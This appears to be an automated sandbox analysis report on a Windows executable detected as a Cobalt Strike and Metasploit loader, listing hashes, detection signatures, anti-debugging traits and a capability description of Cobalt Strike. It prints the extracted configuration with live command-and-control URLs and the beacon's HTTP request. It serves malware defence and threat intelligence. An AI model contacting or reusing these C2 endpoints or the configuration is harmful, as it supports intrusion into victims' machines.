Windows Analysis Report
SecuriteInfo.com.FileRepMalware.23518.16980.exe

Overview

General Information

Sample name: SecuriteInfo.com.FileRepMalware.23518.16980.exe
Analysis ID: 1521532
MD5: ea94a1fe3c2921313e7ea2b77675c7db
SHA1: dd0388d8bdfd510256f26a8e9efe025fd9381867
SHA256: ecbbb2801bb4d27db737c96ac45b2a51b449ddd9e2e2af42c1e85b79caa5a5ab
Tags: exe
Infos:

Detection

CobaltStrike, Metasploit
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected CobaltStrike
Yara detected Metasploit Payload
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Machine Learning detection for sample
Potentially malicious time measurement code found
Uses known network protocols on non-standard ports
Contains functionality for execution timing, often used to detect debuggers
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
Installs a raw input device (often for capturing keystrokes)
Internet Provider seen in connection with other malware
PE file contains more sections than normal
PE file contains sections with non-standard names
Tries to resolve domain names, but no domain seems valid (expired dropper behavior)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Name Description Attribution Blogpost URLs Link
Cobalt Strike, CobaltStrike Cobalt Strike is a paid penetration testing product that allows an attacker to deploy an agent named 'Beacon' on the victim machine. Beacon includes a wealth of functionality to the attacker, including, but not limited to command execution, key logging, file transfer, SOCKS proxying, privilege escalation, mimikatz, port scanning and lateral movement. Beacon is in-memory/file-less, in that it consists of stageless or multi-stage shellcode that once loaded by exploiting a vulnerability or executing a shellcode loader, will reflectively load itself into the memory of a process without touching the disk. It supports C2 and staging over HTTP, HTTPS, DNS, SMB named pipes as well as forward and reverse TCP; Beacons can be daisy-chained. Cobalt Strike comes with a toolkit for developing shellcode loaders, called Artifact Kit.The Beacon implant has become popular amongst targeted attackers and criminal users as it is well written, stable, and highly customizable.
  • APT 29
  • APT32
  • APT41
  • AQUATIC PANDA
  • Anunak
  • Cobalt
  • Codoso
  • CopyKittens
  • DarkHydrus
  • Earth Baxia
  • FIN6
  • FIN7
  • Leviathan
  • Mustang Panda
  • Shell Crew
  • Stone Panda
  • TianWu
  • UNC1878
  • UNC2452
  • Winnti Umbrella
 https://malpedia.caad.fkie.fraunhofer.de/details/win.cobalt_strike

AV Detection
barindex
Antivirus / Scanner detection for submitted sample
Source: SecuriteInfo.com.FileRepMalware.23518.16980.exe Avira: detected
Found malware configuration
Source: 00000000.00000002.1518956360.0000029C510F0000.00000040.00001000.00020000.00000000.sdmp Malware Configuration Extractor: CobaltStrike {"C2Server": "http://106.14.141.209:8087/hkDF", "User Agent": "User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)\r\n"}
Source: 00000000.00000002.1518956360.0000029C510F0000.00000040.00001000.00020000.00000000.sdmp Malware Configuration Extractor: Metasploit {"Headers": "User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)\r\n", "Type": "Metasploit Download", "URL": "http://106.14.141.209/hkDF"}
Multi AV Scanner detection for submitted file
Source: SecuriteInfo.com.FileRepMalware.23518.16980.exe ReversingLabs: Detection: 70%
AI detected suspicious sample
Source: Submited Sample Integrated Neural Analysis Model: Matched 96.7% probability
Machine Learning detection for sample
Source: SecuriteInfo.com.FileRepMalware.23518.16980.exe Joe Sandbox ML: detected
Source: SecuriteInfo.com.FileRepMalware.23518.16980.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23518.16980.exe Code function: 4x nop then sub rbx, qword ptr [rax+18h] 0_2_0069D240
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23518.16980.exe Code function: 4x nop then mov r8, 0000800000000000h 0_2_006A6B60

Networking
barindex
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: http://106.14.141.209:8087/hkDF
Source: Malware configuration extractor URLs: http://106.14.141.209/hkDF
Uses known network protocols on non-standard ports
Source: unknown Network traffic detected: HTTP traffic on port 49701 -> 8087
Detected TCP or UDP traffic on non-standard ports
Source: global traffic TCP traffic: 192.168.2.10:49701 -> 106.14.141.209:8087
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtd CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtd
Tries to resolve domain names, but no domain seems valid (expired dropper behavior)
Source: unknown DNS traffic detected: query: 18.31.95.13.in-addr.arpa replaycode: Name error (3)
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /hkDF HTTP/1.1User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)Host: 106.14.141.209:8087Connection: Keep-AliveCache-Control: no-cache
Source: unknown TCP traffic detected without corresponding DNS query: 106.14.141.209
Source: unknown TCP traffic detected without corresponding DNS query: 106.14.141.209
Source: unknown TCP traffic detected without corresponding DNS query: 106.14.141.209
Source: unknown TCP traffic detected without corresponding DNS query: 106.14.141.209
Source: unknown TCP traffic detected without corresponding DNS query: 106.14.141.209
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic HTTP traffic detected: GET /hkDF HTTP/1.1User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)Host: 106.14.141.209:8087Connection: Keep-AliveCache-Control: no-cache
Source: global traffic DNS traffic detected: DNS query: 18.31.95.13.in-addr.arpa
Source: SecuriteInfo.com.FileRepMalware.23518.16980.exe, 00000000.00000002.1518227006.0000029C2A49C000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.23518.16980.exe, 00000000.00000002.1518227006.0000029C2A4F9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://106.14.141.209:8087/hkDF
Source: SecuriteInfo.com.FileRepMalware.23518.16980.exe, 00000000.00000002.1518227006.0000029C2A4F9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://106.14.141.209:8087/hkDF&
Source: SecuriteInfo.com.FileRepMalware.23518.16980.exe, 00000000.00000002.1518227006.0000029C2A4F9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://106.14.141.209:8087/hkDFN
Source: SecuriteInfo.com.FileRepMalware.23518.16980.exe, 00000000.00000002.1518227006.0000029C2A49C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://106.14.141.209:8087/hkDFly
Installs a raw input device (often for capturing keystrokes)
Source: SecuriteInfo.com.FileRepMalware.23518.16980.exe Binary or memory string: github.com/lxn/win.registerRawInputDevices

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: 00000000.00000002.1518956360.0000029C510F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Identifies the API address lookup function leverage by metasploit shellcode Author: unknown
Source: 00000000.00000002.1518956360.0000029C510F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families. Author: unknown
Source: 00000000.00000002.1517779379.000000C000110000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Identifies the API address lookup function leverage by metasploit shellcode Author: unknown
Source: 00000000.00000002.1517779379.000000C000110000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families. Author: unknown
Detected potential crypto function
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23518.16980.exe Code function: 0_2_006C8060 0_2_006C8060
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23518.16980.exe Code function: 0_2_00685040 0_2_00685040
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23518.16980.exe Code function: 0_2_0069D440 0_2_0069D440
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23518.16980.exe Code function: 0_2_0068B020 0_2_0068B020
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23518.16980.exe Code function: 0_2_006A7000 0_2_006A7000
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23518.16980.exe Code function: 0_2_006B70E0 0_2_006B70E0
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23518.16980.exe Code function: 0_2_006854A0 0_2_006854A0
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23518.16980.exe Code function: 0_2_0069A9A0 0_2_0069A9A0
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23518.16980.exe Code function: 0_2_00688D80 0_2_00688D80
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23518.16980.exe Code function: 0_2_00694260 0_2_00694260
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23518.16980.exe Code function: 0_2_0069EA60 0_2_0069EA60
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23518.16980.exe Code function: 0_2_0068BA40 0_2_0068BA40
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23518.16980.exe Code function: 0_2_0068C640 0_2_0068C640
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23518.16980.exe Code function: 0_2_006A42E0 0_2_006A42E0
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23518.16980.exe Code function: 0_2_00684AC7 0_2_00684AC7
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23518.16980.exe Code function: 0_2_0069E2A0 0_2_0069E2A0
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23518.16980.exe Code function: 0_2_006A6B60 0_2_006A6B60
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23518.16980.exe Code function: 0_2_00693705 0_2_00693705
Found potential string decryption / allocating functions
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23518.16980.exe Code function: String function: 006B2D80 appears 173 times
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23518.16980.exe Code function: String function: 006B4E20 appears 186 times
PE file contains more sections than normal
Source: SecuriteInfo.com.FileRepMalware.23518.16980.exe Static PE information: Number of sections : 13 > 10
Yara signature match
Source: 00000000.00000002.1518956360.0000029C510F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Metasploit_7bc0f998 os = windows, severity = x86, description = Identifies the API address lookup function leverage by metasploit shellcode, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = fdb5c665503f07b2fc1ed7e4e688295e1222a500bfb68418661db60c8e75e835, id = 7bc0f998-7014-4883-8a56-d5ee00c15aed, last_modified = 2021-08-23
Source: 00000000.00000002.1518956360.0000029C510F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Metasploit_c9773203 os = windows, severity = x86, description = Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., creation_date = 2021-04-07, scan_context = file, memory, reference = https://github.com/rapid7/metasploit-framework/blob/04e8752b9b74cbaad7cb0ea6129c90e3172580a2/external/source/shellcode/windows/x64/src/block/block_api.asm, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = afde93eeb14b4d0c182f475a22430f101394938868741ffa06445e478b6ece36, id = c9773203-6d1e-4246-a1e0-314217e0207a, last_modified = 2021-08-23
Source: 00000000.00000002.1517779379.000000C000110000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Metasploit_7bc0f998 os = windows, severity = x86, description = Identifies the API address lookup function leverage by metasploit shellcode, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = fdb5c665503f07b2fc1ed7e4e688295e1222a500bfb68418661db60c8e75e835, id = 7bc0f998-7014-4883-8a56-d5ee00c15aed, last_modified = 2021-08-23
Source: 00000000.00000002.1517779379.000000C000110000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Metasploit_c9773203 os = windows, severity = x86, description = Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., creation_date = 2021-04-07, scan_context = file, memory, reference = https://github.com/rapid7/metasploit-framework/blob/04e8752b9b74cbaad7cb0ea6129c90e3172580a2/external/source/shellcode/windows/x64/src/block/block_api.asm, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = afde93eeb14b4d0c182f475a22430f101394938868741ffa06445e478b6ece36, id = c9773203-6d1e-4246-a1e0-314217e0207a, last_modified = 2021-08-23
Source: SecuriteInfo.com.FileRepMalware.23518.16980.exe Static PE information: Section: /19 ZLIB complexity 0.9934974272088354
Source: SecuriteInfo.com.FileRepMalware.23518.16980.exe Static PE information: Section: /32 ZLIB complexity 0.9958333333333333
Source: SecuriteInfo.com.FileRepMalware.23518.16980.exe Static PE information: Section: /65 ZLIB complexity 0.9972217085798817
Source: classification engine Classification label: mal100.troj.evad.winEXE@2/1@1/1
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7880:120:WilError_03
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23518.16980.exe File opened: C:\Windows\system32\999e755d965c3dfa7a285ddb818297cd4da7f6037d10a9b7a28f683b480e87bfAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA Jump to behavior
Source: SecuriteInfo.com.FileRepMalware.23518.16980.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23518.16980.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: SecuriteInfo.com.FileRepMalware.23518.16980.exe ReversingLabs: Detection: 70%
Source: unknown Process created: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23518.16980.exe "C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23518.16980.exe"
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23518.16980.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23518.16980.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23518.16980.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23518.16980.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23518.16980.exe Section loaded: powrprof.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23518.16980.exe Section loaded: umpdc.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23518.16980.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23518.16980.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23518.16980.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23518.16980.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23518.16980.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23518.16980.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23518.16980.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23518.16980.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23518.16980.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23518.16980.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23518.16980.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23518.16980.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23518.16980.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23518.16980.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23518.16980.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23518.16980.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32 Jump to behavior
Source: SecuriteInfo.com.FileRepMalware.23518.16980.exe Static file information: File size 2407936 > 1048576
Source: SecuriteInfo.com.FileRepMalware.23518.16980.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
PE file contains sections with non-standard names
Source: SecuriteInfo.com.FileRepMalware.23518.16980.exe Static PE information: section name: /4
Source: SecuriteInfo.com.FileRepMalware.23518.16980.exe Static PE information: section name: /19
Source: SecuriteInfo.com.FileRepMalware.23518.16980.exe Static PE information: section name: /32
Source: SecuriteInfo.com.FileRepMalware.23518.16980.exe Static PE information: section name: /46
Source: SecuriteInfo.com.FileRepMalware.23518.16980.exe Static PE information: section name: /65
Source: SecuriteInfo.com.FileRepMalware.23518.16980.exe Static PE information: section name: /78
Source: SecuriteInfo.com.FileRepMalware.23518.16980.exe Static PE information: section name: /90
Source: SecuriteInfo.com.FileRepMalware.23518.16980.exe Static PE information: section name: .symtab
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23518.16980.exe Code function: 0_2_0000029C510F0128 push eax; ret 0_2_0000029C510F0364
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23518.16980.exe Code function: 0_2_0000029C510F02FD push eax; ret 0_2_0000029C510F0364

Hooking and other Techniques for Hiding and Protection
barindex
Uses known network protocols on non-standard ports
Source: unknown Network traffic detected: HTTP traffic on port 49701 -> 8087
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23518.16980.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23518.16980.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23518.16980.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23518.16980.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23518.16980.exe Code function: 0_2_006DB920 rdtscp 0_2_006DB920
Source: SecuriteInfo.com.FileRepMalware.23518.16980.exe, 00000000.00000002.1518227006.0000029C2A514000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: SecuriteInfo.com.FileRepMalware.23518.16980.exe, 00000000.00000002.1518227006.0000029C2A514000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW,
Source: SecuriteInfo.com.FileRepMalware.23518.16980.exe, 00000000.00000002.1518227006.0000029C2A49C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW@

Anti Debugging
barindex
Potentially malicious time measurement code found
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23518.16980.exe Code function: 0_2_006DB920 Start: 006DB929 End: 006DB93F 0_2_006DB920
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23518.16980.exe Code function: 0_2_006DB920 rdtscp 0_2_006DB920

Remote Access Functionality
barindex
Yara detected CobaltStrike
Source: Yara match File source: 00000000.00000002.1518956360.0000029C510F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1517779379.000000C000110000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Yara detected Metasploit Payload
Source: Yara match File source: 00000000.00000002.1518956360.0000029C510F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1517779379.000000C000110000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1521532 Sample: SecuriteInfo.com.FileRepMal... Startdate: 28/09/2024 Architecture: WINDOWS Score: 100 13 18.31.95.13.in-addr.arpa 2->13 17 Found malware configuration 2->17 19 Malicious sample detected (through community Yara rule) 2->19 21 Antivirus / Scanner detection for submitted sample 2->21 23 7 other signatures 2->23 7 SecuriteInfo.com.FileRepMalware.23518.16980.exe 7 2->7         started        signatures3 process4 dnsIp5 15 106.14.141.209, 49701, 8087 CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtd China 7->15 25 Potentially malicious time measurement code found 7->25 11 conhost.exe 7->11         started        signatures6 process7
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
106.14.141.209
 unknown China
37963 CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtd true

Contacted Domains

Name IP Active
18.31.95.13.in-addr.arpa unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://106.14.141.209/hkDF true
    		unknown
    http://106.14.141.209:8087/hkDF true
      		unknown